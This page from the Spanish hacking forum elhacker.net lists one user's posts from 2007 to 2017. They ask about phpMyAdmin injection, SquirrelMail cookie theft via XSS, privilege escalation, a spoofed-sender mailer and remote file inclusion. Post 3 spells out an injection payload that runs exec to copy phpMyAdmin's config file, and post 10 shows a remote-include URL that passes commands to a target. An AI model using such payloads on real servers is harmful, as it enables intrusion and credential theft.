elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Nivel Web / Sitio web con acceso a /cgi-sys/Count.cgi ¿Puede comprometer mi sitio? en: 18 Marzo 2017, 18:28 pm
Buenas, hoy he escaneado mi sitio web en busca de vulns y me ha aparecido que este directorio se encuentra público: /cgi-sys/Count.cgi  ¿Qué problemas y riesgos ha podido acarrearme?
2  Seguridad Informática / Nivel Web / Re: [Duda Phpmyadmin] Donde estan los dichosos Tokens ?? en: 19 Enero 2009, 01:27 am
Muchas gracias ^^ era justo lo que buscaba, es curioso ahora me permite escribir y crear tablas dentro de una base de datos, curioso...
3  Seguridad Informática / Nivel Web / [Duda Phpmyadmin] Donde estan los dichosos Tokens ?? en: 18 Enero 2009, 15:44 pm
Hola!, llevo ya un rato ojeando paginas pero no logro encontrar nada factible sobre los Token en phpmyadmin el caso es que  estoy con la sesion iniciada dentro de phpmyadmin pero no se de donde sacar el Token actual de la sesion para comprobar si es vuln a esta inject:

/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]

salu2.
4  Seguridad Informática / Nivel Web / Re: [DUDA] Steal Cookies con XXS en: 17 Enero 2009, 22:22 pm
woahh horas buscandolo y lo tenia en la cara!! muchas gracias!!, ;D
5  Seguridad Informática / Nivel Web / [DUDA] Steal Cookies con XSS en: 17 Enero 2009, 19:54 pm
Hola, estoy testeando la seguridad de mi webmail un SquirrelMail con version 1.4.9a, buscando por security focus he encontrado lo siguiente:
http://www.securityfocus.com/bid/23910/discuss
Bien, una vez encontrada dicha informacion me he puesto manos a la obra buscando informacion sobre Steal de Cookies mediante XXS por Sangoogle despues de ojear varios manuales en ingles he podido entender que para almacenar una cookie remota un usuario deberia ejecutar una direccion web maliciosa con un script en php estando dentro de SquirrelMail, esto haria que al ejecutar la direccion web la cookie del administrador quedaria plasmada en otro archivo independiente, todo ese proceso como es evidente lo he entendido a la perfeccion.
El problema ha venido hace unos minutos cuando me he dispuesto a buscar un tutorial mas completo donde añada el codigo fuente para utilizarlo, he encontrado varios video tutoriales en milworm los cuales apenas daban informacion para compilarlo, alguien seria tan amable de darme a conocer algun buen tutorial donde expliquen los pasos detallados aun que este este en ingles?, gracias.
6  Seguridad Informática / Hacking / Re: Acceso a otro PC de mi propia WLAN en: 14 Agosto 2008, 00:21 am
Hey as mirado a ver si puedes entrar por netbioss?.
7  Programación / Programación Visual Basic / [Ayuda] Codeando con VB un mailer anonimo en: 3 Julio 2008, 21:16 pm
Buenas, estoy intentando hacer un mailer anonymo en VB 6.0, tengo ya la parte gráfica totalmente completa, ahora me toca empezar con la escrita y me gustaría saber como puedo hacer que el usuario cuando rellene el formulario (servidor smtp, mail falso y mail víctima), se conecte con el servidor smtp especificado y remita los datos especificados.
8  Informática / Electrónica / Re: Como construir un Descrambler "Decodificador" para TV a Cable en: 3 Julio 2008, 19:27 pm
tienes un decodificador de cable? lo digo por que si no es asi es normal que no te deje, lo mejor que puedes hacer es cojer uno de ONO o de la operadora que tengas de cable y intentarlo.
9  Seguridad Informática / Nivel Web / [Duda]Escalar privilegios en phpmyadmin en: 3 Julio 2008, 01:46 am
Buenas, resulta que puedo iniciar sesion con cualquier nombre de usuario en un servidor de phpmyadmin debido a una extraña vuln la cual simple solucion es reiniciar la configuracion, bien pues me gustaria saber si hay algun modo de escalar privilegios.
PD:Las tablas users/admin etc.. no estan solo me muestra 1 y no me deja añadir mas tablas pero si modificarlas esto ultimo no me sirve de nada pues no quiero perjudicar a nadie.
10  Seguridad Informática / Nivel Web / Re: [?] File include en: 20 Agosto 2007, 20:57 pm
jejeje muchas gracias por responder ahora cuando uso el

Código:
<?php
echo "<?php phpinfo(); ?>";
?>

me da a descargar el archivo phplines de el servidor creo que puedo descargar cualquier archivo del server mmmm es eso??es que no me apareció config alguna jeje creo que se me escapa algo eso si cuando intento abrir el susodicho ar4chivo del server vulnerable me aparece completamente en blanco (abierto con block de notas).
Porcierto de que manera podria enviar comandos directamente? asi
www.vulnerable.com/vuln.php?page=http://www.host2.com/archivo.txt?cmd=[comando] ???

Pd: Creo que en vez de descargar archivos lo que hago es crearlos en el server vurln y descargarlos.
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines